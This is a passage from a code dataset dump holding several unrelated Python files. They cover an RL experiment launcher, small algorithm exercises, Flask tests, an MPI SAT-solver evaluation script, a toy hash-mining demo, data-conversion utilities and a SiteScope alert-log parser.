'/data/' + args.name + '/' + str('{:05d}'.format(exp_id)) + '_' + args.type + '_' + args.env_name + '_s'\n else:\n args.save_dir = path + '/data/' + 
str('{:05d}'.format(exp_id)) + '_' + args.type + '_' + args.env_name + '_s'\n os.environ[\"OPENAI_LOGDIR\"] = args.save_dir + '/tmp/'\n args.log_dir = args.save_dir + '/tmp/'\n args.num_env_steps = 25000 * args.num_processes * args.num_steps\n\n args.save_dir += '_T_' + str(args.T) + '_N_' + str(args.N) + '_rd_' + str(args.reward_delay)+ '_az_' + str(args.a_z) + '_cp_' + str(args.clip_param) + '_hs_' + str(args.hidden_size)\n\n os.makedirs(args.save_dir, exist_ok=True)\n\n if args.type == 'dmp':\n env_name = args.env_name\n args.env_name += '_pos'\n args.goal_type = 'int_path'\n dmp_experiment(args)\n\n if args.type == 'ppo':\n env_name = args.env_name\n args.env_name += '_pos'\n ppo_experiment(args)\n\n if args.type == 'ppo-multi':\n env_name = args.env_name\n args.env_name += '_pos'\n args.goal_type = 'multi_act'\n dmp_experiment(args)\n","sub_path":"ndp/main_rl.py","file_name":"main_rl.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"158275362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nQuestion:\nGiven a string, determine if it is a palindrome, considering only alphanumeric characters and ignoring cases.\nFor example,\n\"A man, a plan, a canal: Panama\" is a palindrome. \"race a car\" is not a palindrome.\n\"\"\"\n# Have two pointes one at the start and the other at the end\ndef is_palindrome(string):\n\ti = 0\n\tj = len(string) - 1\n\twhile (i < j):\n\t\tleft = string[i]\n\t\tright = string[j]\n\t\tif left.isalpha() == False:\n\t\t\ti += 1\n\t\t\tcontinue\n\t\telif right.isalpha() == False:\n\t\t\tj -= 1\n\t\t\tcontinue\n\t\telse:\n\t\t\tleft = left.lower()\n\t\t\tright = right.lower()\n\n\t\tif left == right:\n\t\t\ti += 1\n\t\t\tj -= 1\n\t\telse:\n\t\t\tprint(\"%s %s mismatch. %s is not a palindrome\" % (left, right, string))\n\t\t\treturn\n\tprint(\"%s is a palindrome\" % string)\n\n#is_palindrome('malayalam')\nis_palindrome('A man, a plan, a canal: Panama')","sub_path":"strings/04_valid_palindrome.py","file_name":"04_valid_palindrome.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504326815","text":"\"\"\" This module will test the views file \"\"\"\nfrom flask_testing import TestCase\nfrom tests.service import manage_send_answer\n\n\nclass TestViews(TestCase):\n \"\"\"\n this class is used for testing the render template method\n by using library flask testing\n \"\"\"\n\n render_templates = False\n\n def create_app(self):\n\n from app.views import app\n app.config['TESTING'] = True\n return app\n\n def test_return_index_template(self): # REQUIRE BLINKER LIBRARY TO WORK\n\n response = self.client.get(\"/\")\n assert response.status_code == 200\n self.assert_template_used('index.html')\n\n def test_assert_not_process_the_template(self):\n response = self.client.get(\"/\")\n assert b\"\" == response.data\n\n\ndef test_send_answer():\n \"\"\"\n this method will test an imitation of the Ajax route method\n this method is in the service file\n It globably test that the all back-end is correctly working\n \"\"\"\n\n result = manage_send_answer(\n \"Salut grandpy ! 
je rêve d'aller visiter mulhouse !\")\n for element in result['answer']:\n assert \"Mulhouse (/myluz/) est une commune française\" in element\n\n assert result['lat'] == '47.749481'\n assert result['lng'] == '7.33994'\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178249797","text":"import argparse\nimport numpy as np\nfrom mpi4py import MPI\nfrom time import time as now\n\nfrom constants import static\nfrom model.backdoor import Backdoor\nfrom configuration import configurator\nfrom output.module.logger import Logger\nfrom output.module.debugger import Debugger\nfrom model.case_generator import CaseGenerator\nfrom constants.runtime import runtime_constants as rc\nfrom util.parse.cnf_parser import CnfParser\n\nparser = argparse.ArgumentParser(description='CryptoEv')\nparser.add_argument('keygen', type=str, help='key generator')\nparser.add_argument('backdoor', type=str, help='load backdoor from specified file')\nparser.add_argument('times', type=int, help='how many times repeat evaluating')\nparser.add_argument('-cp', metavar='tag/path', type=str, default=\"true\", help='tag or path to configuration file')\nparser.add_argument('-v', metavar='0', type=int, default=0, help='[0-3] verbosity level')\nparser.add_argument('-d', '--description', metavar='str', default=\"\", type=str, help='experiment description')\n\nparser.add_argument('-md', '--mpi_debug', metavar='0', type=bool, default=False, help='debug file for all nodes')\n\nargs = parser.parse_args()\npath, configuration = configurator.load(args.cp, mpi=True)\nkey_generator = configurator.get_key_generator(args.keygen)\nrc.configuration = configuration\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n# output\nif rank == 0:\n output = configuration[\"output\"]\n output.create(\n key_generator=key_generator.tag,\n description=args.description,\n conf_path=path,\n )\n\n# backdoor\nbackdoors = Backdoor.load(args.backdoor)\nfor backdoor in backdoors:\n backdoor.check(key_generator)\n\n# solvers\nsolvers = configuration[\"solvers\"]\nfor solver in solvers:\n solver.check_installation()\n\n# random state\nif rank == 0:\n ri_list = np.random.randint(2 ** 32 - 1, size=size)\nelse:\n ri_list = []\nri_list = comm.bcast(ri_list, root=0)\nrs = np.random.RandomState(ri_list[rank])\n\n# case_generator\ncnf_path = static.cnfs[key_generator.tag]\nrc.cnf = CnfParser().parse_for_path(cnf_path)\n\nrc.case_generator = CaseGenerator(\n random_state=rs,\n algorithm=key_generator,\n)\n\npredictive_f = rc.configuration[\"predictive_function\"]\npredictive_f.selection.set_mpi_sett(size, rank)\nsolver = solvers.get(\"main\")\nfor i in range(len(backdoors)):\n if rank == 0:\n rc.logger = Logger('%s_%d' % (output.get_log_path(), i))\n rc.debugger = Debugger('%s_%d' % (output.get_debug_path(), i), args.v)\n\n if args.mpi_debug:\n df = rc.debugger.debug_file if rank == 0 else \"\"\n df = comm.bcast(df, root=0)\n if rank != 0:\n rc.debugger = Debugger(\"%s_%d\" % (df, rank), args.v)\n\n # print header\n if rank == 0:\n rc.logger.deferred_write(\"-- key generator: %s\\n\" % args.keygen)\n rc.logger.deferred_write(\"-- %s\\n\" % solvers)\n rc.logger.deferred_write(\"-- pf type: %s\\n\" % predictive_f.type)\n rc.logger.deferred_write(\"-- time limit: %s\\n\" % solvers.get_tl(\"main\"))\n rc.logger.deferred_write(\"-- selection: %s\\n\" % predictive_f.selection)\n 
rc.logger.deferred_write(\"-- backdoor: %s\\n\" % backdoors[i])\n rc.logger.write(\"------------------------------------------------------\\n\")\n\n solver.reset_params()\n for it in range(args.times):\n start_work_time = now()\n c_out = predictive_f.compute(backdoors[i])\n cases = comm.gather(c_out[0], root=0)\n\n if rank == 0:\n cases = np.concatenate(cases)\n\n time = now() - start_work_time\n r = predictive_f.calculate(backdoors[i], (cases, time))\n\n rc.logger.write(\"------------------------------------------------------\\n\", \"iteration step: %d\\n\" % it)\n rc.logger.write('options: %s\\n' % solver.options)\n value, pf_log = r[0], r[1]\n rc.logger.write(pf_log)\n rc.logger.write(\"true value: %.7g\\n\" % value)\n\n solver.options.rnd()\n options_str = str(solver.options)\n else:\n options_str = \"\"\n\n options_str = comm.bcast(options_str, root=0)\n if rank != 0:\n solver.options.set(options_str)\n rc.debugger.write(2, 1, \"been received params: %s\" % options_str)\n\n\nif rank == 0:\n configuration[\"output\"].close()\nconfiguration[\"concurrency\"].terminate()\n","sub_path":"mpi_params.py","file_name":"mpi_params.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"104523640","text":"col1 = open('col1.txt')\ncol2 = open('col2.txt')\nf = open('col1col2.txt', 'w')\n\n# zip is useful to use some sequence object!\nfor (c1, c2) in zip(col1, col2):\n c1 = c1.replace(\"\\n\", \"\")\n c2 = c2.replace(\"\\n\", \"\")\n f.write(\"%s\\t%s\\n\" % (c1,c2))\n\ncol1.close()\ncol2.close()\nf.close()\n \n","sub_path":"NLP100/chapter02/solve13.py","file_name":"solve13.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"443562621","text":"from chronos.utils import datetime\nfrom datetime import timedelta\n\nclass Event(object):\n \"\"\"An internal representation of an event.\"\"\"\n\n def __init__(self, uid, title='', description='', start=None, end=None,\n location=None, calendar_uid='', color=None, active=True):\n\n self.uid = uid\n self.title = title\n self.description = description\n self.start = start\n self.end = end\n self.location = location\n self.calendar_uid = calendar_uid\n self.color = color\n self.active = active\n\n if isinstance(start, (float, int)):\n self.start = datetime.fromtimestamp(start)\n if isinstance(end, (float, int)):\n self.end = datetime.fromtimestamp(end)\n\n if (self.end.day - self.start.day == 1 and self.end.hour == 0 and\n self.end.minute == 0 and self.end.second == 0):\n # This is a single day event but actually spawns over 2 days\n prev = self.end - timedelta(seconds=1)\n self.end = datetime.from_datetime(prev)\n\n def __eq__(self, other):\n\n if (self.uid == other.uid and\n self.title == other.title and\n self.description == other.description and\n self.start == other.start and\n self.end == other.end and\n self.location == other.location and\n self.calendar_uid == other.calendar_uid and\n self.active == other.active):\n return True\n else:\n return False\n\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\n def __repr__(self):\n return ''.format(self.title)\n","sub_path":"src/chronos/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"79554386","text":"# Sentence Reversal\n\n'''\nGiven a string of words, reverse all the words. 
For example:\n\nGiven:\n'This is the best'\n\nReturn:\n'best the is This'\n\nAs part of this exercise you should remove all leading and trailing whitespace. So that inputs such as:\n' space here' and 'space here '\nboth become:\n'here space'\n'''\n\n\ndef rev_word(s):\n s = s.split(' ')\n s.reverse()\n rev = ' '.join([word for word in s if word != ''])\n return rev\n\n\nprint(rev_word('Hi John, are you ready to go?'))\nprint(rev_word(' space before'))\n\n\ndef rev_word2(s):\n length = len(s)\n words = []\n\n i = 0\n while i < length:\n if s[i] != ' ':\n word_start = i\n while i < length and s[i] != ' ':\n i += 1\n words.append(s[word_start:i])\n i += 1\n words = ' '.join(reversed(words))\n return words\n\n\nprint(rev_word2('Hi John, are you ready to go?'))\nprint(rev_word2(' space before'))","sub_path":"data structures/01 Array Sequences/05sentence_reversal.py","file_name":"05sentence_reversal.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"204454112","text":"if(__name__ == \"__main__\"):\n\tn, p = [int(tmp) for tmp in raw_input().split(' ')]\n\tl = []\n\tfor i in range(n):\n\t\tl.append(raw_input() == \"half\")\n\tif(l[-1]):\n\t\tans, buy = 2, 1\n\telse:\n\t\tans, buy = 1, 0.5\n\tfor i in range(n - 2, -1, -1):\n\t\tif(l[i]):\n\t\t\tbuy += ans\n\t\t\tans = ans * 2\n\t\telse:\n\t\t\tbuy += ans + 0.5\n\t\t\tans = ans * 2 + 1\n\tprint(int(buy * p))","sub_path":"online_judge/codeforces/632, Educational Codeforces Round 9/A. Grandma Laura and Apples.py","file_name":"A. Grandma Laura and Apples.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"179585914","text":"from hashlib import sha256\nMAX_NONCE = 100000000\n\ndef SHA256(text):\n return sha256(text.encode('ascii')).hexdigest()\n\ndef mine(block_number,transactions,previous_hash,prefix_zeros):\n prefix_str = '0'*prefix_zeros\n for nonce in range(MAX_NONCE):\n text = str(block_number) + transactions + previous_hash + str(nonce)\n new_hash = SHA256(text)\n if new_hash.startswith(prefix_str):\n print(f\"yay! Successfully mined bitcoins with nonce value: {nonce}\")\n return new_hash\n \n raise BaseException(f\"Couldn't find a correct hash after trying {MAX_NONCE} times\")\n\nif __name__ =='__main__':\n transactions = '''\n dhaval->bhavin->20,\n mando->cara->45\n '''\n difficulty = 4\n import time\n start = time.time()\n print(\"start mining\")\n new_hash = mine(5 , transactions , '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048' , difficulty)\n total_time = str((time.time() - start))\n print(f\"end mining. 
Mining took : {total_time} seconds\")\n print(new_hash)","sub_path":"BitcoinMining.py","file_name":"BitcoinMining.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"297219164","text":"# RADIX SORT ALGORITHM\n# Descrizione: https://www.thelicato.it/blog/algoritmi-di-ordinamento-radix-sort-in-python/\n\nimport sys\nfrom utils import *\n\ndef counting_sort_radix(A,cifra):\n array=A[:] #creo una copia del vettore da ordinare\n\n C=[0 for i in range(10)]\n\n for element in array:\n C[element//10**(cifra-1)%10]+=1\n\n for i in range(1,10):\n C[i]=C[i]+C[i-1]\n \n for j in range(len(array)-1,-1,-1):\n A[C[array[j]//10**(cifra-1)%10]-1]=array[j]\n C[array[j]//10**(cifra-1)%10]-=1\n\ndef radix_sort(array,num_cifre):\n for cifra in range(1,num_cifre+1):\n counting_sort_radix(array,cifra)\n","sub_path":"radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"365919643","text":"import random\r\n\r\n\r\ndef main():\r\n text_list = []\r\n\r\n with open('rt-polaritydata/rt-polarity.neg', 'r', encoding='latin-1') as f:\r\n for line in f:\r\n text_list.append('-1\\t{}'.format(line))\r\n\r\n with open('rt-polaritydata/rt-polarity.pos', 'r', encoding='latin-1') as f:\r\n for line in f:\r\n text_list.append('+1\\t{}'.format(line))\r\n\r\n random.shuffle(text_list)\r\n\r\n with open('sentiment.txt', 'w', encoding='latin-1') as f:\r\n f.write(''.join(text_list))\r\n\r\n pos = 0\r\n neg = 0\r\n with open('sentiment.txt', 'r', encoding='latin-1') as f:\r\n for line in f:\r\n line = line.split('\\t')[0]\r\n if line == '+1':\r\n pos += 1\r\n else:\r\n neg += 1\r\n\r\n print(f'pos {pos}, neg {neg}')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"hwichan/chapter08/knock70.py","file_name":"knock70.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"177658112","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('..')\nsys.path.insert(0, 'input')\nsys.path.insert(0, 'clustering')\nsys.path.insert(0, 'output')\n\nimport input.writingWavAndPng as input\nimport clustering.templateMatching as tm\nimport output.test_out as output\n\nif __name__ == '__main__':\n fname = input.recordingAndWriting()\n im = tm.ImageMatching()\n classfilename = im.run(fname)\n classfilename = '../clustering/' + classfilename\n output.output(classfilename)\n","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"481902090","text":"#\n# @lc app=leetcode.cn id=36 lang=python3\n#\n# [36] 有效的数独\n#\n\n# @lc code=start\nclass Solution:\n from collections import defaultdict\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n row, col, box = defaultdict(set), defaultdict(set), defaultdict(set)\n for i in range(9):\n for j in range(9):\n if board[i][j] != '.':\n if board[i][j] not in row[i]:\n row[i].add(board[i][j])\n else:\n return False\n if board[i][j] not in col[j]:\n col[j].add(board[i][j])\n else:\n return False\n if board[i][j] not in box[(i // 3, j // 3)]:\n box[(i // 3, j // 3)].add(board[i][j])\n else:\n return False\n return True\n# @lc 
code=end\n","sub_path":"Week07/36.有效的数独.py","file_name":"36.有效的数独.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"619893631","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 3 11:29:42 2019\n\n@author: rdamseh\n\"\"\"\n\n\nimport sys\n\n# add VascGraph package to python path\ntry:\n sys.path.append('/home/rdamseh/GraphPaper2018V1/')\nexcept: pass\n\nimport os\nimport subprocess\nfrom VascGraph.GraphIO import WriteSWC, ReadSWC\n\n\n\nclass ValidateDiadem:\n \n '''\n Get diadem score from true and exp SWC tree files\n \n '''\n \n def __init__(self, true_graphs=None, exp_graphs=None, D=1, X=1, \n R=1, Z=1, zpath=True,\n m=False):\n \n \n if type(true_graphs)!=list:\n self.true_graphs=[true_graphs]\n else:\n self.true_graphs=true_graphs\n \n if type(exp_graphs)!=list:\n self.exp_graphs=[exp_graphs]\n else:\n self.exp_graphs=exp_graphs\n \n self.scores=[]\n \n self.directory=os.path.dirname(os.path.realpath(__file__))\n self.D=D\n self.X=X\n self.R=R\n self.Z=Z\n \n if zpath:\n self.zpath='true'\n else:\n self.zpath='false'\n \n if m:\n self.m='true'\n else:\n self.m='false'\n \n def __GetSingleScore(self, true_graph, exp_graph):\n \n \n WriteSWC(path=self.directory+'/', name='true.swc', tree_graph=true_graph, root=0) # wirte true tree\n WriteSWC(path=self.directory+'/', name='exp.swc', tree_graph=exp_graph, root=0) # wirte exp tree\n \n true=self.directory+'/true.swc'\n test=self.directory+'/exp.swc'\n \n command=['java', '-jar', self.directory+'/DiademMetric.jar', \n '-G', true, \n '-T', test, \n '-m', self.m, \n '-D', str(self.D),\n '-x', str(self.X),\n '-R', str(self.R),\n '--z-threshold', str(self.Z), \n '--z-path', self.zpath,\n '-w','1']\n try:\n self.scores.append(subprocess.check_output(command).split()[1])\n except:\n self.scores.append(subprocess.check_output(command))\n\n \n def GetScores(self):\n\n for i, j in zip(self.true_graphs, self.exp_graphs):\n \n self.__GetSingleScore(i, j)\n \n return self.scores\n\n\n\nif __name__==\"__main__\":\n \n \n \n \n path='/home/rdamseh/GraphPaper2018V1/validation/mra/trees/'\n truefile='truetree2.swc' \n testfile='mytree2.swc'\n \n \n true_graph=ReadSWC(path+truefile).GetOutput()\n exp_graph=ReadSWC(path+testfile).GetOutput()\n \n \n diadem=ValidateDiadem([true_graph, true_graph], [exp_graph, exp_graph])\n s=diadem.GetScores()\n \n \n \n ","sub_path":"build/lib/VascGraph/GraphValidation/ValidateDiadem.py","file_name":"ValidateDiadem.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"123904739","text":"import argparse\nparse_desc = \"\"\"Convert gridded 1 min GLM imagery produced by\nglmtools to a zarr store, rechunking to smaller tiles across a longer time\ninterval.\n\nRequires glmtools and dask\n\"\"\"\n\ndef create_parser():\n parser = argparse.ArgumentParser(description=parse_desc)\n parser.add_argument(dest='filenames',metavar='filename', nargs='*')\n parser.add_argument('-o', '--output_path',\n metavar='filename for the output zarr store',\n required=True, dest='zarr_out', action='store')\n parser.add_argument('-m', '--temp_zarr_path',\n metavar='filename template including path',\n required=False, dest='zarr_temp', action='store',\n default='./_glm_store_temp.zarr')\n parser.add_argument('-x', '--x_chunks',\n metavar='number of x gridpoints per chunk',\n required=False, dest='x_chunks', action='store',\n 
default=678, type=int)\n parser.add_argument('-y', '--y_chunks',\n metavar='number of y gridpoints per chunk',\n required=False, dest='y_chunks', action='store',\n default=678, type=int)\n parser.add_argument('-t', '--t_chunks',\n metavar='number of time intervals per chunk',\n required=False, dest='t_chunks', action='store',\n default=60, type=int)\n parser.add_argument('--dask_workers',\n metavar='number of dask workers',\n required=False, dest='dask_workers', action='store',\n default=1, type=int)\n parser.add_argument('--dask_threads',\n metavar='number of threads per dask worker',\n required=False, dest='dask_threads', action='store',\n default=2, type=int)\n\n return parser\n\nimport os\nfrom glmtools.io.imagery import open_glm_time_series\n\nif __name__ == '__main__':\n\n parser = create_parser()\n args = parser.parse_args()\n\n from dask.distributed import Client\n dask_client=Client(n_workers=args.dask_workers, threads_per_worker=args.dask_threads)\n print(dask_client)\n # from chunks import rechunker_wrapper\n import numpy as np\n\n\n rechunk_spec = {'x':args.x_chunks, 'y':args.y_chunks, 'time':args.t_chunks}\n\n\n filenames = args.filenames\n zarr_store = args.zarr_out\n temp_zarr_store = args.zarr_temp\n filenames.sort()\n n_files = len(filenames)\n\n n_time_chunks = int(np.ceil(n_files/rechunk_spec['time']))\n for i in range(n_time_chunks):\n these_files = slice(i*rechunk_spec['time'],\n int(np.min([(i+1)*rechunk_spec['time'], n_files])))\n\n\n print(\"Reading GLM for time chunk {0}/{1}\".format(i+1,n_time_chunks))\n ltg_ds_nc = open_glm_time_series(filenames[these_files]\n ).sortby('time').chunk(chunks=rechunk_spec)\n n_times = ltg_ds_nc.dims['time']\n print(\"Converting {0} GLM times\".format(n_times))\n\n\n# 64x64 spatial tiles are 165 Mpixels per variable\n# In [85]: 64*64*(24*60)*30/(1024**3)\n# Out[85]: 0.164794921875\n if os.path.exists(zarr_store):\n ltg_ds_nc.to_zarr(zarr_store, consolidated=True, append_dim='time')\n else:\n ltg_ds_nc.to_zarr(zarr_store, consolidated=True, mode='w')\n # Cannot run this with Distributed client - get error\n # distributed.utils_perf - WARNING - full garbage collections took 10% CPU time recently\n# rechunker_wrapper(ltg_ds_nc, zarr_store, temp_zarr_store, chunks=rechunk_spec, consolidated=True)\n# Replaced by above\n# ltg_ds_nc.chunk(rechunk_spec).to_zarr(zarr_store)\n# ltg_ds_nc.close()\n","sub_path":"scripts/glml2_to_zarr.py","file_name":"glml2_to_zarr.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388667071","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\n\r\n#载入数据\r\nprint(\"from mnist-data/ load data begin \")\r\nmnist = input_data.read_data_sets('mnist-data/', one_hot=True)\r\nprint(\"mnist-data load success\")\r\n\r\nbatch_size = 100\r\n#n_batch 表示一个周期需要几个batch\r\nn_batch = mnist.train.num_examples //batch_size\r\n\r\nx = tf.placeholder(tf.float32, [None, 784], name = 'x')\r\ny = tf.placeholder(tf.float32, [None, 10], name = 'y')\r\n\r\nW = tf.Variable(tf.zeros([784,10]))\r\nb = tf.Variable(tf.zeros([10]))\r\n\r\nprediction = tf.nn.softmax(tf.matmul(x, W) + b)\r\nloss = tf.reduce_mean(tf.square(y - prediction))\r\n\r\n#学习率\r\nlearningrate = 0.01\r\n\r\n#定义优化器\r\noptimizer = tf.train.GradientDescentOptimizer(learningrate).minimize(loss)\r\n\r\n#计算准确率\r\ncorrect_prediction = tf.equal(tf.argmax(y, 
1), tf.argmax(prediction, 1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\ninit = tf.global_variables_initializer()\r\n\r\n#tf.device('/gpu:0')\r\nsess = tf.Session()\r\nsess.run(init)\r\n\r\n\r\n#迭代周期次数\r\nepoch_num = 1000\r\nfor epoch in range(epoch_num):\r\n\tfor batch in range(n_batch):\r\n\t\tx_batch,y_batch = mnist.train.next_batch(batch_size)\r\n\t\tsess.run(optimizer,feed_dict={x:x_batch, y:y_batch})\r\n\t\t\r\n\taccu = sess.run(accuracy,feed_dict={x:mnist.test.images, y:mnist.test.labels})\r\n\tif(epoch %5 ==0):\r\n\t\tprint(\"epoch is {0} ,test accuracy = {1}\".format(epoch,accu))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"03-mnist-LineR.py","file_name":"03-mnist-LineR.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"77318862","text":"import re\nimport json\nimport time\n\n\ndef del_dups(seq):\n seen = {}\n pos = 0\n for item in seq:\n if item not in seen:\n seen[item] = True\n seq[pos] = item\n pos += 1\n del seq[pos:]\n return seq\n\ndef popula_alertas(sitescope):\n dic_alertas = []\n num_alertas = 0\n\n novo = False\n\n pattern = re.compile(' alert-(.*?): ')\n\n try:\n alertas = open(sitescope + '/alert.log.old', 'r', encoding=\"utf-8\")\n linhas = alertas.readlines()\n except UnicodeDecodeError:\n alertas = open(sitescope + '/alert.log.old', 'r', encoding=\"latin-1\")\n linhas = alertas.readlines()\n\n\n for linha in linhas:\n linha = linha.replace('\\x96', '-')\n if not pattern.match(linha):\n novo = False\n\n if '\\talert\\n' in linha:\n hora = linha.rstrip('\\talert\\n')\n dic_alertas.append({'hora':hora})\n novo = True\n num_alertas += 1\n\n if novo and pattern.match(linha):\n atributo, valor = linha.rstrip('\\n').split(': ')[:2]\n dic_alertas[num_alertas - 1][atributo.lstrip(' ')] = valor.rstrip('\\n')\n\n try:\n alertas = open(sitescope + '/alert.log', 'r', encoding=\"utf-8\")\n linhas = alertas.readlines()\n except UnicodeDecodeError:\n alertas = open(sitescope + '/alert.log', 'r', encoding=\"latin-1\")\n linhas = alertas.readlines()\n\n\n for linha in linhas:\n linha = linha.replace('\\x96', '-')\n if not pattern.match(linha):\n novo = False\n\n if '\\talert\\n' in linha:\n hora = linha.rstrip('\\talert\\n')\n dic_alertas.append({'hora':hora})\n novo = True\n num_alertas += 1\n\n if novo and pattern.match(linha):\n atributo, valor = linha.rstrip('\\n').split(': ')[:2]\n dic_alertas[num_alertas - 1][atributo.lstrip(' ')] = valor.rstrip('\\n')\n\n return dic_alertas\n\ndef gerar_arquivo_alertas(dic_alertas, sitescope):\n with open(sitescope + '/arquivo_alertas.txt', 'w') as saida:\n for alerta in dic_alertas:\n nome_alerta = str(alerta).replace('\\x96', '-')\n saida.write(nome_alerta + '\\n')\n\n\n headers = ''\n with open(sitescope + '/arquivo_alertas_web.txt', 'w') as saida:\n for alerta in dic_alertas[:1]:\n for header in alerta.keys():\n headers += header + ','\n saida.write(headers[:-1]+'\\n')\n\n for alerta in dic_alertas:\n valores = ''\n for valor in alerta.values():\n valores += valor.replace(',', ';') + ','\n saida.write(valores[:-1]+'\\n')\n\n\ndef gerar_arquivo_unicos(dic_alertas, sitescope):\n print(sitescope + '\\t\\tLendo o arquivo (' + str(len(dic_alertas)) + ') entradas...' )\n monitores = []\n for alerta in dic_alertas:\n monitores.append(alerta['alert-monitor'])\n\n\n print(sitescope + '\\t\\tCalculando a quantidade de alertas por monitor (' + str(len(monitores)) + ') alertas...' 
)\n monitores_quantidade = []\n for nome_alerta in del_dups(monitores):\n monitores_quantidade.append([(get_quantidade_alertas(dic_alertas, nome_alerta)), nome_alerta])\n\n ordenados = sorted(monitores_quantidade, reverse=True)\n\n print (sitescope + '\\t\\tEscrevendo saida (' + str(len(ordenados)) + ') monitores...')\n with open(sitescope + '/monitores.txt', 'w') as arq_monitores:\n for alerta in ordenados:\n nome_alerta = alerta[1].replace('\\x96', '-')\n arq_monitores.write('(' + str(alerta[0]) + ') - ' + nome_alerta + '\\n')\n\ndef obter_alertas_arquivo(sitescope):\n return [json.loads(line.rstrip('\\n').replace(\"'\", \"\\\"\")) for line in open(sitescope + '/arquivo_alertas.txt', 'r')]\n\ndef obter_monitores_arquivo(sitescope):\n return [line.rstrip('\\n') for line in open(sitescope + '/monitores.txt', 'r')]\n\ndef ordenar_monitores(lista_monitores, campo):\n if 'quantidade' in campo.lower():\n return lista_monitores\n\n if 'nome' in campo.lower():\n arqs = []\n for entrada in lista_monitores:\n arqs.append(entrada.split(' - ')[1] + ' - ' + entrada.split(' - ')[0])\n ordenado = []\n for o in sorted(arqs):\n ordenado.append(o.split(' - ')[1] + ' - ' + o.split(' - ')[0])\n\n return ordenado\ndef get_alertas_by(dic_alertas, campo, valor):\n filtrados = []\n for alerta in dic_alertas:\n if valor.lower() in alerta[campo].lower():\n filtrados.append(alerta)\n return filtrados\n\ndef get_quantidade_alertas(dic_alertas, name):\n quantidade = 0\n for alerta in dic_alertas:\n if alerta['alert-monitor'] == name:\n quantidade += 1\n\n return quantidade\n\ndef get_unique_alerts(dic_alertas):\n\n monitores = []\n for alerta in dic_alertas:\n monitores.append(alerta['alert-monitor'])\n\n monitores_quantidade = []\n for nome_alerta in set(monitores):\n monitores_quantidade.append([(get_quantidade_alertas(dic_alertas, nome_alerta)), nome_alerta])\n\n lista_formatada = []\n for alerta in sorted(monitores_quantidade, reverse=True):\n lista_formatada.append('(' + str(alerta[0]) + ') - ' + alerta[1])\n\n return lista_formatada\n\n\nif __name__ == '__main__':\n #obter_alertas_arquivo('sitescope001')\n\n sitescopes = [#'sitescope001',\n #'sitescope002',\n 'sitescope003',\n #'sitescope004',\n ]\n\n for sitescope in sitescopes:\n print('')\n print (sitescope + '\\tProcessando arquivos de log...')\n dic_alertas = popula_alertas(sitescope)\n\n print (sitescope + '\\tFormatando saida...')\n gerar_arquivo_alertas(dic_alertas, sitescope)\n\n print (sitescope + '\\tGerando monitores...')\n gerar_arquivo_unicos(dic_alertas, sitescope)\n\n obter_alertas_arquivo('sitescope003')\n\n\n","sub_path":"web/metricsgraphics/project/alert_viewer.py","file_name":"alert_viewer.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45439224","text":"import requests\r\nimport json\r\nfrom api_key import api_key\r\nfrom alpha_vantage.timeseries import TimeSeries\r\n\r\n# This is the library that wraps the API get methods as function calls\r\n\r\nurl = \"https://api.ciscospark.com/v1/\"\r\n# API URL\r\nheaders = {\"Authorization\": \"Bearer \" + 